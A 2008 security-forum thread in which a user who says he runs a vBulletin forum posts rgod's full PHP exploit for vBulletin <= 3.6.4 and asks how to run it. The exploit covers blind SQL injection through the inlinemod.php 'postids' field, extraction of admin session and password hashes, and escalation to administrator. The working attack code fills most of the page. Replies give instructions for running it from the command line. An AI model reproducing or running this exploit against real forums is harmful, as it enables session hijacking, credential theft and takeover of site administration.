Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: November 15, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 58 Members: 0 Total: 58 Full disclosure SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879) Security issue in the TX Text Control .NET Server for ASP.NET. SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater Unsafe eval() in TestRail CLI 4 vulnerabilities in ibmsecurity 32 vulnerabilities in IBM Security Verify Access xlibre Xnest security advisory & bugfix releases APPLE-SA-10-29-2024-1 Safari 18.1 SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600) SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333) APPLE-SA-10-28-2024-8 visionOS 2.1 APPLE-SA-10-28-2024-7 tvOS 18.1 APPLE-SA-10-28-2024-6 watchOS 11.1 APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1 APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1 IT Security and Insecurity Portal www.waraxe.us Forum Index -> Newbies corner -> Help needed :) View previous topic :: View next topic Help needed :) Posted: Fri Mar 14, 2008 6:29 pm F4r4Zm0In Active user Joined: Feb 17, 2008 Posts: 30 Hi, all Its a long time back i discovered waraxe.us and i found it usefull from that day onwards:) Well, now i am back and just discoved an exploit for vbulletin 3.6.5 [My forum version - which i am running] I have wampsever intalled on my machine and i would like to test this one on localhost to test whether my forum is exploitable using this one or not. I know how to compile perl coded exploits, but i think this one is not written in perl, so i need help to compile this one Any help will be appriciated, as i am aware if someone else discovered it and used against my live forum then i must be founding my self in trouble The exploit is given below: Quote: <?php print_r(' ----------------------------------------------------------------------------- vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege escalation by session hijacking exploit by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org Works regardless of php.ini settings, you need a Super Moderator account to copy posts among threads, to be launched while admin is logged in to the control panel, this will give you full admin privileges note: this will flood the forum with empty threads even! ----------------------------------------------------------------------------- '); if ($argc<7) { print_r(' ----------------------------------------------------------------------------- Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS host: target server (ip/hostname) path: path to vbulletin user/pass: you need a moderator account forumid: existing forum postid: existing post Options: -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy Example: php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80 php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81 ----------------------------------------------------------------------------- '); die; } /* vulnerable code in inlinemod.php near lines 185-209: ... case 'docopyposts': $vbulletin->input->clean_array_gpc('p', array( 'postids' => TYPE_STR, )); $postids = explode(',', $vbulletin->GPC['postids']); foreach ($postids AS $index => $postid) { if ($postids["$index"] != intval($postid)) { unset($postids["$index"]); } } if (empty($postids)) { eval(standard_error(fetch_error('no_applicable_posts_selected'))); } if (count($postids) > $postlimit) { eval(standard_error(fetch_error('you_are_limited_to_working_with_x_posts', $postlimit))); } break; ... when an element of $postids array is not an integer, it fails to unset() the proper value. An example: <?php $foo[1]="99999) UNION SELECT foo FROM foo WHERE foo=1 LIMIT 1/*"; $foo[2]=intval($foo[1]); echo $foo[1]."\n"; echo $foo[2]."\n"; if ($foo[1] != $foo[2]) { echo "they are different"; } else { echo "they match!"; } ?> output: 99999) UNION SELECT foo FROM foo WHERE foo=1 LIMIT 1/* 99999 they match! this because when php tries to comparise a string with an integer it tries to convert the string in its integer value, it chooses the first integer chars of the string itself! so unset() never run! the result is sql injection near lines 3792-3800: ... $posts = $db->query_read_slave(" SELECT post.postid, post.threadid, post.visible, post.title, post.username, post.dateline, post.parentid, post.userid, thread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid, thread.sticky, thread.open, thread.iconid FROM " . TABLE_PREFIX . "post AS post LEFT JOIN " . TABLE_PREFIX . "thread AS thread USING (threadid) WHERE postid IN (" . implode(',', $postids) . ") ORDER BY post.dateline "); ... this exploit extract various session hashes from the database to authenticate as admin and to change the privileges of a registered user I could not find a way to see results inside html, so this asks true/false questions to the database, copying posts around threads possible patch, replace: foreach ($postids AS $index => $postid) { if ($postids["$index"] != intval($postid)) { unset($postids["$index"]); } } with: foreach ($postids AS $index => $postid) { $postids["$index"]=(int)$postids["$index"]; } and, some line before: foreach ($threadids AS $index => $threadid) { if ($threadids["$index"] != intval($threadid)) { unset($threadids["$index"]); } } with: foreach ($threadids AS $index => $threadid) { $threadids["$index"]=(int)$threadids["$index"]; } vendor was contacted by email form... */ error_reporting(7); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $user=$argv[3]; $pass=md5($argv[4]); $forumid=(int)$argv[5]; $existing_post=(int)$argv[6]; $port=80; $proxy=""; for ($i=3; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];} if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $data="vb_login_username=$user"; $data.="&vb_login_password="; $data.="&s="; $data.="&do=login"; $data.="&vb_login_md5password=$pass"; $data.="&vb_login_md5password_utf=$pass"; $packet="POST ".$p."login.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."login.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $cookie=""; $temp=explode("Set-Cookie: ",$html); for ($i=1; $i<count($temp); $i++) { $temp2=explode(" ",$temp[$i]); $cookie.=" ".trim($temp2[0]); } //echo "your cookie -> ".$cookie."\n\n"; if (!eregi("sessionhash",$cookie)){die("failed to login...");}$temp=str_replace(" ","",$cookie);$temp=str_replace("sessionhash","",$temp); $temp=str_replace("lastvisit","",$temp);$temp=str_replace("lastactivity","",$temp);$temp=explode("=",$temp);$temp=explode(";",$temp[1]); $cookie_prefix=trim($temp[1]);echo "cookie prefix -> ".$cookie_prefix."\n"; $chars[0]=0;//null $chars=array_merge($chars,range(48,57)); //numbers $j=1;$uid=""; echo "admim user id -> "; while (!strstr($uid,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data ="s="; $data.="&do=docopyposts"; $data.="&destforumid=$forumid"; $data.="&title=suntzu"; $data.="&forumid=$forumid"; $data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/ **/WHERE/**/usergroupid=6/**/LIMIT/**/1/*"; $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."profile.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: ".$cookie."; \r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $temp=explode("showthread.php?t=",$html); $temp2=explode("\n",$temp[1]); $thread=(int)$temp2[0]; $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."profile.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: ".$cookie."; \r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");} if (eregi("join date",$html)) {$uid.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die("\nExploit failed..."); } } $j++; } if (trim($uid)==""){die("\nExploit failed...");}else{echo "\nvulnerable!";} $uid=intval($uid); function my_encode($my_string) { $encoded="CHAR("; for ($k=0; $k<=strlen($my_string)-1; $k++) { $encoded.=ord($my_string[$k]); if ($k==strlen($my_string)-1) {$encoded.=")";} else {$encoded.=",";} } return $encoded; } $j=1;$my_uid=""; echo "\nyour user id -> "; while (!strstr($my_uid,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data ="s="; $data.="&do=docopyposts"; $data.="&destforumid=$forumid"; $data.="&title=suntzu"; $data.="&forumid=$forumid"; $data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/ **/WHERE/**/username=".my_encode($user)."/**/LIMIT/**/1/*"; $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."profile.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: ".$cookie."; \r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");} $temp=explode("showthread.php?t=",$html); $temp2=explode("\n",$temp[1]); $thread=(int)$temp2[0]; $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."profile.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: ".$cookie."; \r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (eregi("join date",$html)) {$my_uid.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die("\nExploit failed..."); } } $j++; } $my_uid=intval($my_uid); $chars[0]=0;//null $chars=array_merge($chars,range(48,57)); //numbers $chars=array_merge($chars,range(97,102));//a-f letters $j=1;$sess_hash=""; echo "\nsession hash -> "; while (!strstr($sess_hash,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data ="s="; $data.="&do=docopyposts"; $data.="&destforumid=$forumid"; $data.="&title=suntzu"; $data.="&forumid=$forumid"; $data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(sessionhash,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/* */session/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*"; $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."profile.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: ".$cookie."; \r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");} $temp=explode("showthread.php?t=",$html); $temp2=explode("\n",$temp[1]); $thread=(int)$temp2[0]; $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."profile.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: ".$cookie."; \r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (eregi("join date",$html)) {$sess_hash.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die("\nExploit failed..."); } } $j++; } $j=1;$my_hash=""; echo "\nuser password hash -> "; while (!strstr($my_hash,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data ="s="; $data.="&do=docopyposts"; $data.="&destforumid=$forumid"; $data.="&title=suntzu"; $data.="&forumid=$forumid"; $data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/u ser/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*"; $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."profile.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: ".$cookie."; \r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");} $temp=explode("showthread.php?t=",$html); $temp2=explode("\n",$temp[1]); $thread=(int)$temp2[0]; $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."profile.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: ".$cookie."; \r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (eregi("join date",$html)) {$my_hash.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die("\nExploit failed..."); } } $j++; } $j=1;$cpsess_hash=""; echo "\ncp session hash -> "; while (!strstr($cpsess_hash,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data ="s="; $data.="&do=docopyposts"; $data.="&destforumid=$forumid"; $data.="&title=suntzu"; $data.="&forumid=$forumid"; $data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(hash,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cpses sion/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*"; $packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."profile.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: ".$cookie."; \r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $temp=explode("showthread.php?t=",$html); $temp2=explode("\n",$temp[1]); $thread=(int)$temp2[0]; $packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."profile.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: ".$cookie."; \r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");} if (eregi("join date",$html)) {$cpsess_hash.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die("\nExploit failed..."); } } $j++; } echo "\n"; $packet ="GET ".$p."admincp/user.php?do=edit&u=$my_uid HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."profile.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; bbuserid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); $temp=explode("adminhash\" value=\"",$html); $temp2=explode("\"",$temp[1]); $adminhash=$temp2[0]; echo "adminhash ->".$adminhash."\n"; if ($adminhash<>"") {echo "\ndone! you are in... updating ".$user." rights";} else {die("\nexploit failed...");} //join to the Administrator group $my_email="suntzu@suntzu.com"; $data ="do=update"; $data.="&adminhash=$adminhash"; $data.="&quicklinks=user.php%3Fdo%3Deditaccess%26u%3D".$my_uid; $data.="&user%5Busername%5D=$user"; $data.="&password="; $data.="&user%5Bemail%5D=$my_email"; $data.="&user%5Blanguageid%5D=0"; $data.="&user%5Busertitle%5D=Admin"; $data.="&user%5Bcustomtitle%5D=0"; $data.="&user%5Bhomepage%5D="; $data.="&user%5Bbirthday%5D%5Bmonth%5D=0"; $data.="&user%5Bbirthday%5D%5Bday%5D="; $data.="&user%5Bbirthday%5D%5Byear%5D="; $data.="&user%5Bshowbirthday%5D=0"; $data.="&user%5Bsignature%5D="; $data.="&user%5Bicq%5D="; $data.="&user%5Baim%5D="; $data.="&user%5Byahoo%5D="; $data.="&user%5Bmsn%5D="; $data.="&user%5Bskype%5D="; $data.="&options%5Bcoppauser%5D=0"; $data.="&user%5Bparentemail%5D=$my_email"; $data.="&user%5Breferrerid%5D="; $data.="&user%5Bipaddress%5D="; $data.="&user%5Bposts%5D=0"; $data.="&userfield%5Bfield1%5D="; $data.="&userfield%5Bfield2%5D="; $data.="&userfield%5Bfield3%5D="; $data.="&userfield%5Bfield4%5D="; $data.="&user%5Busergroupid%5D=6";//primary usergroup, 6=Administrators $data.="&user%5Bdisplaygroupid%5D=-1"; $data.="&user%5Bmembergroupids%5D%5B%5D=5";//secondary usergroup, 5=Super Moderators $data.="&options%5Bshowreputation%5D=1"; $data.="&user%5Breputation%5D=10"; $data.="&user%5Bwarnings%5D=0"; $data.="&user%5Binfractions%5D=0"; $data.="&user%5Bipoints%5D=0"; $data.="&options%5Badminemail%5D=1"; $data.="&options%5Bshowemail%5D=0"; $data.="&options%5Binvisible%5D=0"; $data.="&options%5Bshowvcard%5D=0"; $data.="&options%5Breceivepm%5D=1"; $data.="&options%5Breceivepmbuddies%5D=0"; $data.="&options%5Bemailonpm%5D=0"; $data.="&user%5Bpmpopup%5D=0"; $data.="&options%5Bshowsignatures%5D=1"; $data.="&options%5Bshowavatars%5D=1"; $data.="&options%5Bshowimages%5D=1"; $data.="&user%5Bautosubscribe%5D=-1"; $data.="&user%5Bthreadedmode%5D=0"; $data.="&user%5Bshowvbcode%5D=1"; $data.="&user%5Bstyleid%5D=0"; $data.="&adminoptions%5Badminavatar%5D=0"; $data.="&adminoptions%5Badminprofilepic%5D=0"; $data.="&user%5Btimezoneoffset%5D=0"; $data.="&options%5Bdstauto%5D=1"; $data.="&options%5Bdstonoff%5D=0"; $data.="&user%5Bdaysprune%5D=-1"; $data.="&user%5Bjoindate%5D%5Bmonth%5D=2"; $data.="&user%5Bjoindate%5D%5Bday%5D=26"; $data.="&user%5Bjoindate%5D%5Byear%5D=2007"; $data.="&user%5Bjoindate%5D%5Bhour%5D=14"; $data.="&user%5Bjoindate%5D%5Bminute%5D=39"; $data.="&user%5Blastactivity%5D%5Bmonth%5D=2"; $data.="&user%5Blastactivity%5D%5Bday%5D=26"; $data.="&user%5Blastactivity%5D%5Byear%5D=2007"; $data.="&user%5Blastactivity%5D%5Bhour%5D=14"; $data.="&user%5Blastactivity%5D%5Bminute%5D=58"; $data.="&user%5Blastpost%5D%5Bmonth%5D=0"; $data.="&user%5Blastpost%5D%5Bday%5D="; $data.="&user%5Blastpost%5D%5Byear%5D="; $data.="&user%5Blastpost%5D%5Bhour%5D="; $data.="&user%5Blastpost%5D%5Bminute%5D="; $data.="&userid=".$mu_uid; $data.="&ousergroupid="; $data.="&odisplaygroupid=0"; $data.="&userfield%5Bfield1_set%5D=1"; $data.="&userfield%5Bfield2_set%5D=1"; $data.="&userfield%5Bfield3_set%5D=1"; $data.="&userfield%5Bfield4_set%5D=1"; $packet ="POST ".$p."admincp/user.php?do=edit&u=$my_uid HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."profile.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(1); //now give full rights to the new Administrator $data ="do=update"; $data.="&adminhash=".$adminhash; $data.="&adminpermissions%5Bcanadminsettings%5D=1"; $data.="&adminpermissions%5Bcanadminstyles%5D=1"; $data.="&adminpermissions%5Bcanadminlanguages%5D=1"; $data.="&adminpermissions%5Bcanadminforums%5D=1"; $data.="&adminpermissions%5Bcanadminthreads%5D=1"; $data.="&adminpermissions%5Bcanadmincalendars%5D=1"; $data.="&adminpermissions%5Bcanadminusers%5D=1"; $data.="&adminpermissions%5Bcanadminpermissions%5D=1"; $data.="&adminpermissions%5Bcanadminfaq%5D=1"; $data.="&adminpermissions%5Bcanadminimages%5D=1"; $data.="&adminpermissions%5Bcanadminbbcodes%5D=1"; $data.="&adminpermissions%5Bcanadmincron%5D=1"; $data.="&adminpermissions%5Bcanadminmaintain%5D=1"; $data.="&adminpermissions%5Bcanadminplugins%5D=1"; $data.="&cssprefs="; $data.="&dismissednews="; $data.="&userid=".$my_uid; $data.="&oldpermissions=98300"; $data.="&adminpermissions%5Bcanadminupgrade%5D=0"; $packet ="POST ".$p."admincp/adminpermissions.php?do=update HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."profile.php\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; ".$cookie_prefix."userid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); echo "\nnow go to http://".$host.$path."admincp/index.php and login to the control panel..."; ?> # milw0rm.com [2007-02-28] Thanks and regards Posted: Fri Mar 14, 2008 9:22 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu First of all, this is privilege escalation exploit. From source: Code: .. you need a Super Moderator account to copy posts among threads, to be launched while admin is logged in to the control panel, this will give you full admin privileges ... user/pass: you need a moderator account ... So - do you have (super)moderator account on target vb installation allready? It is php script, so make sure, that php is installed to your PC, copy-paste exploit source to text file with ".php" extension and then execute exploit from command prompt. Posted: Fri Mar 14, 2008 11:41 pm F4r4Zm0In Active user Joined: Feb 17, 2008 Posts: 30 waraxe wrote: First of all, this is privilege escalation exploit. From source: Code: .. you need a Super Moderator account to copy posts among threads, to be launched while admin is logged in to the control panel, this will give you full admin privileges ... user/pass: you need a moderator account ... So - do you have (super)moderator account on target vb installation allready? It is php script, so make sure, that php is installed to your PC, copy-paste exploit source to text file with ".php" extension and then execute exploit from command prompt. Offcourse i do have a super moderator account Well I have wampserver installed on my pc Which version of php are you talking about also i tried opening the exploit after saving it with notepad as a.php and it only blows open up "Open With" Dialog box Confused ? Posted: Sat Mar 15, 2008 7:41 am pexli Valuable expert Joined: May 24, 2007 Posts: 665 Location: Bulgaria Reading exploit is good think. Code: Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS host: target server (ip/hostname) path: path to vbulletin user/pass: you need a moderator account forumid: existing forum postid: existing post Options: -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy Example: php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80 php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81 Posted: Sat Mar 15, 2008 10:22 